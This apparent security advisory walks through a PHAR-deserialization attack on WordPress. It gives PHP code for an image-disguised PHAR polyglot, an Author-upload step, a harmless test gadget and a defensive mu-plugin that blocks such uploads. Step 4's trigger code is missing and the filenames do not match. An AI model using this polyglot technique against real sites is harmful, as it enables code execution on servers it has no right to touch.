Please note that the following proof-of-concept requires WordPress to be running a PHP version older than 8.0.

1. Create a PHAR file by saving the following PHP code as `create_phar.php` and running `php --define phar.readonly=0 create_phar.php` (the `phar.readonly=0` setting is required, since PHP refuses to write PHAR archives by default).

    <?php
    // Placeholder class: its name is what the serialized metadata will reference.
    class Evil {}

    // Create a new PHAR archive on disk.
    $phar = new Phar('poc.phar');
    // Any file entry is enough; the archive just needs to be valid.
    $phar->addFromString('test.png', 'text');
    // The stub starts with JPEG magic bytes so the file passes image checks,
    // followed by the mandatory __HALT_COMPILER() marker every PHAR needs.
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    // The metadata is stored serialized and is unserialized when the archive
    // is accessed through the phar:// stream wrapper (on PHP < 8.0).
    $phar->setMetadata(new Evil());

2. As an Author user, upload the `poc.phar.jpg` file. Note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).

3. Create a simulated gadget on the server with the following code:

    <?php
    // Simulated gadget: a class whose __wakeup() runs when an object of this
    // class is unserialized, here only proving that deserialization happened.
    class Evil {
      function __wakeup() {
        die('Arbitrary deserialization');
      }
    }
4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):
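As an added defensive example (not part of the original proof-of-concept and not code from WordPress or the affected plugin), the following must-use plugin shows two mitigations for the chain above: it unregisters the `phar://` stream wrapper, so file operations can no longer reach a PHAR's serialized metadata, and it rejects uploads whose bytes contain the `__HALT_COMPILER` marker that every PHAR archive carries, whatever file extension or leading magic bytes it was given. The `wp_handle_upload_prefilter` hook and `stream_wrapper_unregister()` are real WordPress and PHP APIs; the function name `bpu_looks_like_phar`, the 64 KiB scan window and the suggested filename are assumptions made for this example.

```php
<?php
/**
 * Added example (not part of the original advisory): a WordPress mu-plugin
 * that reduces PHAR deserialization risk in two independent ways.
 * Suggested location (assumption): wp-content/mu-plugins/block-phar-uploads.php
 */

// 1. Remove the phar:// stream wrapper entirely. After this, calls such as
//    file_exists('phar://...') fail instead of parsing an archive, so its
//    metadata is never unserialized. Only do this if no plugin or theme on
//    the site legitimately relies on phar://.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

/**
 * Returns true when the file content looks like a PHAR archive, regardless of
 * its extension or the magic bytes at the start of the file. A PHAR stub must
 * end with __HALT_COMPILER(); so an "image" containing that string is a
 * polyglot like the one built in step 1. Only the first 64 KiB (assumption)
 * are inspected, which is more than enough for any realistic stub.
 */
function bpu_looks_like_phar(string $path): bool
{
    $head = @file_get_contents($path, false, null, 0, 65536);
    if ($head === false) {
        return false;
    }
    return stripos($head, '__HALT_COMPILER') !== false;
}

/**
 * 2. Reject such uploads before WordPress moves them into wp-content/uploads.
 *    wp_handle_upload_prefilter receives the $_FILES entry for the upload;
 *    setting $file['error'] to a string aborts the upload and shows that
 *    message to the user, so an Author cannot plant the archive in step 2.
 */
add_filter('wp_handle_upload_prefilter', function (array $file): array {
    if (!empty($file['tmp_name']) && bpu_looks_like_phar($file['tmp_name'])) {
        $file['error'] = 'Upload rejected: file contains a PHAR archive stub.';
    }
    return $file;
});
```

The upload filter is the more targeted control, since it blocks the polyglot at the point where the proof-of-concept needs it stored on the server, while unregistering the wrapper removes the deserialization sink even if an archive reaches the filesystem by another route. Upgrading to PHP 8.0 or later also closes the specific path used here, because the phar:// stream wrapper no longer unserializes metadata automatically on file operations; only an explicit `Phar::getMetadata()` call does.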